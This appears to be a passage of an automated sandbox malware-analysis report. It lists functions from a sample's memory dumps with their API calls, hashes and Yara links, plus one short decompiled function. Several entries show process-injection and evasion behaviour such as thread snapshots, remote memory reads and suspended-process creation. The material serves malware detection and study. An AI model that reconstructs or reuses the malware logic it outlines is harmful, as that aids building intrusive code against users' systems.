                                                                                                                                        • Opcode ID: e66e9fb859a22ff9e91b10358cf436248cfbf045e446e654124ef53111cf0bd9
                                                                                                                                        • Instruction ID: 315ca49c581a7323a8ea983a6086c2a4bbe8811aca3791a90d81b3f08aac49d7
                                                                                                                                        • Opcode Fuzzy Hash: e66e9fb859a22ff9e91b10358cf436248cfbf045e446e654124ef53111cf0bd9
                                                                                                                                        • Instruction Fuzzy Hash: 6B1106B5610A00EFEF149B45CC91BFE77A8EB45320F10003BF941DB252D7B99E059B69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461DAA, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,0046E160,00000018,00441F28,NTDLL.DLL,7250775A,00441F28,NTDLL.DLL,4772644C,00441F28,NTDLL.DLL,4C72644C,00000000,?,?,00441F28), ref: 00461E5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: NTDLL.DLL
                                                                                                                                        • API String ID: 3510742995-1613819793
                                                                                                                                        • Opcode ID: b558bffe0b4c5479b7828446a18cf82f1ffa8d02fc50de88f7d303e34f7a7efd
                                                                                                                                        • Instruction ID: 679ac28c4a929e2716b6ab79bdc696f522fbbd0703fc99c6b8229874a3f36029
                                                                                                                                        • Opcode Fuzzy Hash: b558bffe0b4c5479b7828446a18cf82f1ffa8d02fc50de88f7d303e34f7a7efd
                                                                                                                                        • Instruction Fuzzy Hash: 5F115979601114EBEB14DF57EC46CE33BE9AB827207084136E9098B271F6B16D05DB6E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045DF0C, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,?,00000000,00000000), ref: 0045DF3C
                                                                                                                                        • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,?,00000000), ref: 0045DF83
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 552344955-0
                                                                                                                                        • Opcode ID: 76b69dea9580bad59473518e185424f15a22fb312abfb4cc8f9add1665eeb4f6
                                                                                                                                        • Instruction ID: 1280cc830b35023f092a47f881ab164c7ad001eb331bbb21c7590b460c828ac5
                                                                                                                                        • Opcode Fuzzy Hash: 76b69dea9580bad59473518e185424f15a22fb312abfb4cc8f9add1665eeb4f6
                                                                                                                                        • Instruction Fuzzy Hash: 1D11A372D00208ABC721DF99C844B9FB7F8EF9435AF20405EF80197241DB789E09CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00465617, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,59935A40,00000000,0044BA4B,?), ref: 00465654
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,0044BA4B,?,?), ref: 004656B5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$FileFreeHeapSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 892271797-0
                                                                                                                                        • Opcode ID: 873f241a3cf8b48063aabc96a9a4d71a6dafb0b0e36710b1778f7531b4153283
                                                                                                                                        • Instruction ID: 2d504193d724c0e73ef0d3c6378a47115e471c5ee904c6ccda087cfe8c7a9e4b
                                                                                                                                        • Opcode Fuzzy Hash: 873f241a3cf8b48063aabc96a9a4d71a6dafb0b0e36710b1778f7531b4153283
                                                                                                                                        • Instruction Fuzzy Hash: C5114CB5D01108EBCF00EBA1DE45BDE77BCEB04304F500566EA05E3261E7789B48DB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004431D1, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 0044323C
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
                                                                                                                                          • Part of subcall function 00443861: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 00443887
                                                                                                                                          • Part of subcall function 00443861: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00443893
                                                                                                                                          • Part of subcall function 00443861: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,00000000,?,00000000), ref: 004438AA
                                                                                                                                          • Part of subcall function 00443861: GetProcAddress.KERNEL32(00000000), ref: 004438B1
                                                                                                                                          • Part of subcall function 00443861: Thread32First.KERNEL32(?,0000001C), ref: 004438C1
                                                                                                                                          • Part of subcall function 00443861: CloseHandle.KERNEL32(?), ref: 00443909
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                                                                                                        • String ID: Kill
                                                                                                                                        • API String ID: 2627809124-2803628375
                                                                                                                                        • Opcode ID: dc691ec0e5eaa63d7d6d76d1f9a5e4311c21860d8268748ef179fbf9f34cc8dd
                                                                                                                                        • Instruction ID: 3bf5b592444e3f215c1beded055edf4ea9129c91dd77ec271b705f3cc6690a27
                                                                                                                                        • Opcode Fuzzy Hash: dc691ec0e5eaa63d7d6d76d1f9a5e4311c21860d8268748ef179fbf9f34cc8dd
                                                                                                                                        • Instruction Fuzzy Hash: C101D631A00108BFAB11ABE69C85C9FFBADEB0474971000BAF80192111EAB59F04CA6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045D9AA, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,0044BBF0,0045D878,00000000,00000000), ref: 0045DA1C
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
                                                                                                                                          • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
                                                                                                                                          • Part of subcall function 00442520: lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
                                                                                                                                          • Part of subcall function 00442520: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
                                                                                                                                          • Part of subcall function 00442520: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
                                                                                                                                          • Part of subcall function 00442520: GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
                                                                                                                                          • Part of subcall function 00442520: HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                                                                                                        • String ID: Scr
                                                                                                                                        • API String ID: 730886825-1633706383
                                                                                                                                        • Opcode ID: 41403514538cb39fe4edecf98a0b48a6ef9c0f7e6b5b05f59a21838889fb11b9
                                                                                                                                        • Instruction ID: f8be53c44cfe6770e3ecbcc58642be8da774725146df3639aad560dd4ca1f3b5
                                                                                                                                        • Opcode Fuzzy Hash: 41403514538cb39fe4edecf98a0b48a6ef9c0f7e6b5b05f59a21838889fb11b9
                                                                                                                                        • Instruction Fuzzy Hash: BE01A731E04204BADB219B91DD05FDFBBEDDF05715F00006AF901A2191F6B5AE08D66A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00447BCD, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(0046DF5C), ref: 00447BE2
                                                                                                                                          • Part of subcall function 0044976D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00449798
                                                                                                                                          • Part of subcall function 0044976D: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004497A5
                                                                                                                                          • Part of subcall function 0044976D: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00449831
                                                                                                                                          • Part of subcall function 0044976D: GetModuleHandleA.KERNEL32(00000000), ref: 0044983C
                                                                                                                                          • Part of subcall function 0044976D: RtlImageNtHeader.NTDLL(00000000), ref: 00449845
                                                                                                                                          • Part of subcall function 0044976D: RtlExitUserThread.NTDLL(00000000), ref: 0044985A
                                                                                                                                        • InterlockedDecrement.KERNEL32(0046DF5C), ref: 00447C06
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1011034841-0
                                                                                                                                        • Opcode ID: 2424d9d9ca4e265630dc2d105ba4982c9b9ea0b49a0031586fe0f3be49c4b611
                                                                                                                                        • Instruction ID: 55b44441a760d3601fd11addb19552480235db8308450097778df650722dc2fd
                                                                                                                                        • Opcode Fuzzy Hash: 2424d9d9ca4e265630dc2d105ba4982c9b9ea0b49a0031586fe0f3be49c4b611
                                                                                                                                        • Instruction Fuzzy Hash: D5E0923160C1219BAB211BB4BD48B1BA750EB1078AF004D3BF647E0151E7288C82DA9E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044F41F, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00443C78: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00443CB1
                                                                                                                                          • Part of subcall function 00443C78: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00443CE7
                                                                                                                                          • Part of subcall function 00443C78: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443CF3
                                                                                                                                          • Part of subcall function 00443C78: lstrcmpi.KERNEL32(?,00000000), ref: 00443D30
                                                                                                                                          • Part of subcall function 00443C78: StrChrA.SHLWAPI(?,0000002E), ref: 00443D39
                                                                                                                                          • Part of subcall function 00443C78: lstrcmpi.KERNEL32(?,00000000), ref: 00443D4B
                                                                                                                                          • Part of subcall function 00443C78: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00443D9C
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7), ref: 0044F45E
                                                                                                                                          • Part of subcall function 0044C536: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
                                                                                                                                          • Part of subcall function 0044C536: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7,?,00000318), ref: 0044F4E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4138075514-0
                                                                                                                                        • Opcode ID: 297157d09288b85df16844cbefeb9d11cadd49664e1b3be5759bb15eeb3ae279
                                                                                                                                        • Instruction ID: cfc5d3f380ce71d092418be7f8efc29257ac728d2242655b12fefe0a8b9dc9ff
                                                                                                                                        • Opcode Fuzzy Hash: 297157d09288b85df16844cbefeb9d11cadd49664e1b3be5759bb15eeb3ae279
                                                                                                                                        • Instruction Fuzzy Hash: 0621E471D01229ABDF61DFA5DC80ADEBBB4BF08724F10812AF914B6250D7385A45CFA8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751FDB, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E73751FDB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t28;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E73751A17( &_v8,  &_v12,  *0x7375414c ^ 0x239770ca) != 0) {
					if(_v8 == 0) {
						_t28 = 0;
					} else {
						_t28 = E73751732(_t22, _v8,  *0x7375414c ^ 0x54b37a7c);
					}
					if(_t28 != 0) {
						_t15 = E737519DA(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t28,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x73754110, 0, _v8);
				}
				return _t25;
			}









                                                                                                                                        0x73751fdb
                                                                                                                                        0x73751fde
                                                                                                                                        0x73751fdf
                                                                                                                                        0x73751ff4
                                                                                                                                        0x73751ffd
                                                                                                                                        0x73752003
                                                                                                                                        0x7375201c
                                                                                                                                        0x73752005
                                                                                                                                        0x73752018
                                                                                                                                        0x73752018
                                                                                                                                        0x73752020
                                                                                                                                        0x73752022
                                                                                                                                        0x7375202a
                                                                                                                                        0x73752032
                                                                                                                                        0x7375203a
                                                                                                                                        0x7375203c
                                                                                                                                        0x7375203c
                                                                                                                                        0x7375203a
                                                                                                                                        0x7375204c
                                                                                                                                        0x73752052
                                                                                                                                        0x73752057

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 73751A17: EntryPoint.ONEROUS.TAR(?,00000000,?,?,00000000,-00000008,73751DE8), ref: 73751AA2
                                                                                                                                        • StrStrIA.KERNELBASE(00000000,?,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 73752032
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 7375204C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EntryFreeHeapPoint.
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1965514895-0
                                                                                                                                        • Opcode ID: d2b657cf2441cb6edf951e0b5cd791bb5cb215fc132dd75d1b9330f63602d7aa
                                                                                                                                        • Instruction ID: 6519311b0d4becc6ec3096278808ca83d9526bb3ac7e37a5f95642dec4ebdfd2
                                                                                                                                        • Opcode Fuzzy Hash: d2b657cf2441cb6edf951e0b5cd791bb5cb215fc132dd75d1b9330f63602d7aa
                                                                                                                                        • Instruction Fuzzy Hash: E9018F77A0121CABDB099BA6CD44FAF76BDAB48601F214152F90AE3140E635DA0197A0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044A5EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(41564441), ref: 0044A604
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleModule
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                        • Opcode ID: df4bf6fedcdd4a089933e7d63a0b73474961d68466528875ee0fe3fbf74f072e
                                                                                                                                        • Instruction ID: 7fa4302e45b38a374179c5404bc24311be213732c66af5ea1edaa7aa8cefc1ae
                                                                                                                                        • Opcode Fuzzy Hash: df4bf6fedcdd4a089933e7d63a0b73474961d68466528875ee0fe3fbf74f072e
                                                                                                                                        • Instruction Fuzzy Hash: 64214772E40114EFEB20EF99C88199E77B4FB08318F1A446BE24597301E778AD02CB5E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045EB16, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,004440F5,00000000,00000000), ref: 0045EB51
                                                                                                                                          • Part of subcall function 0045865A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0046E240), ref: 00458671
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleInformationModuleProcessQuery
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2776635927-0
                                                                                                                                        • Opcode ID: ab9a18e4123bf65d71cdc700adb632549430af8ddfd392013510705793699f9a
                                                                                                                                        • Instruction ID: 8f91dc281724e10a6796421fdd2617fd2eb2c62bedf28d4f12f9ca4d0ab890a1
                                                                                                                                        • Opcode Fuzzy Hash: ab9a18e4123bf65d71cdc700adb632549430af8ddfd392013510705793699f9a
                                                                                                                                        • Instruction Fuzzy Hash: 6C216F71600204EFDB28CF56C490A6B77A9EF44393714486AED868B352DA39FF08CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045B315, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0045B367
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                        • Opcode ID: 03165894c11c0bb39d0e4ccbe94072e50028107b26fe344ba94062d4acc16d81
                                                                                                                                        • Instruction ID: bcaabe112ae6a62ca026e607f7d1497df1d8a109bd6517a8fae8ae07e0b76101
                                                                                                                                        • Opcode Fuzzy Hash: 03165894c11c0bb39d0e4ccbe94072e50028107b26fe344ba94062d4acc16d81
                                                                                                                                        • Instruction Fuzzy Hash: AE112136600209AFDF018F9ADC409DA7BA9FF09374B058136FD18A2221D775DD25DF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00430214, Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,0043003F,00430440,00430440,00000000,00430440,?,00430440), ref: 0043021C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: 7875bb7f737bed39fb0680a3cf7666931517f9b459418e3c88d12f3c8971f2fe
                                                                                                                                        • Instruction ID: 75822bd97874a1f072fccabedcbbc38f2da148cebf204db0fe72679d355e52eb
                                                                                                                                        • Opcode Fuzzy Hash: 7875bb7f737bed39fb0680a3cf7666931517f9b459418e3c88d12f3c8971f2fe
                                                                                                                                        • Instruction Fuzzy Hash: 51F089739001109BDF209E18C86935B3750AF59358F2E53D6DC5AAF341D639DC428B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004461AE, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00441000: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044101F
                                                                                                                                          • Part of subcall function 00441000: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044102A
                                                                                                                                          • Part of subcall function 00441000: _wcsupr.NTDLL ref: 00441037
                                                                                                                                          • Part of subcall function 00441000: lstrlenW.KERNEL32(00000000), ref: 0044103F
                                                                                                                                        • ResumeThread.KERNEL32(00000004,?,004426F5,?), ref: 004461C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3646851950-0
                                                                                                                                        • Opcode ID: a3fb0c52724d8bccde75b25164fe05e2d2223c0328aaca15415aa759530c2b80
                                                                                                                                        • Instruction ID: f9e72837cb7bdedb663314d7b8d5dc5409438a3cd2f99a0ae7a33c9200544477
                                                                                                                                        • Opcode Fuzzy Hash: a3fb0c52724d8bccde75b25164fe05e2d2223c0328aaca15415aa759530c2b80
                                                                                                                                        • Instruction Fuzzy Hash: CCD05E34604310A6F6211B21CD06F0BBED06F12B88F10882FFDC4505A2EB7A9860A60F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00466341, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0046634E
                                                                                                                                          • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 123106877-0
                                                                                                                                        • Opcode ID: 782eca1988c5730eaa6c929c06325daa8ec6ad80ceb781519fad3cf2bde0e2b7
                                                                                                                                        • Instruction ID: 3a83648d578bf2a011f7a3ea4fd8c0c513ecebf81f276e992a22fd0cfcb3cb00
                                                                                                                                        • Opcode Fuzzy Hash: 782eca1988c5730eaa6c929c06325daa8ec6ad80ceb781519fad3cf2bde0e2b7
                                                                                                                                        • Instruction Fuzzy Hash: 9AA012C11541017C301455421E42C36411DC0C0B21331800FB80190040F84C0C55003F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046635C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0046634E
                                                                                                                                          • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 123106877-0
                                                                                                                                        • Opcode ID: 08b05aff3230d6f6d3af9f715ea362dbfc2630f593942ea5806031ed12d110b2
                                                                                                                                        • Instruction ID: ec3e56b6a621a810a3ea550951d202aad92250a256dfbcd8999b39da238d9f99
                                                                                                                                        • Opcode Fuzzy Hash: 08b05aff3230d6f6d3af9f715ea362dbfc2630f593942ea5806031ed12d110b2
                                                                                                                                        • Instruction Fuzzy Hash: 23A011C22A8202BC3008A2822E82C3A822CC0C0B22332880FB80280080F88C0CAA003F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044EB0A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 7b97b404af55ee29c77750684eb6e0aaf90e885a8af139b7cc6385b2d9c87fa2
                                                                                                                                        • Instruction ID: 1e1702b7bd138a84d75bf33bb1e7c519405a549cc539cfc8bb5178939759f77a
                                                                                                                                        • Opcode Fuzzy Hash: 7b97b404af55ee29c77750684eb6e0aaf90e885a8af139b7cc6385b2d9c87fa2
                                                                                                                                        • Instruction Fuzzy Hash: 4BB01231950140ABCA014B00DE04F067B21A760700F014834F209800B097B11C64EB1F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

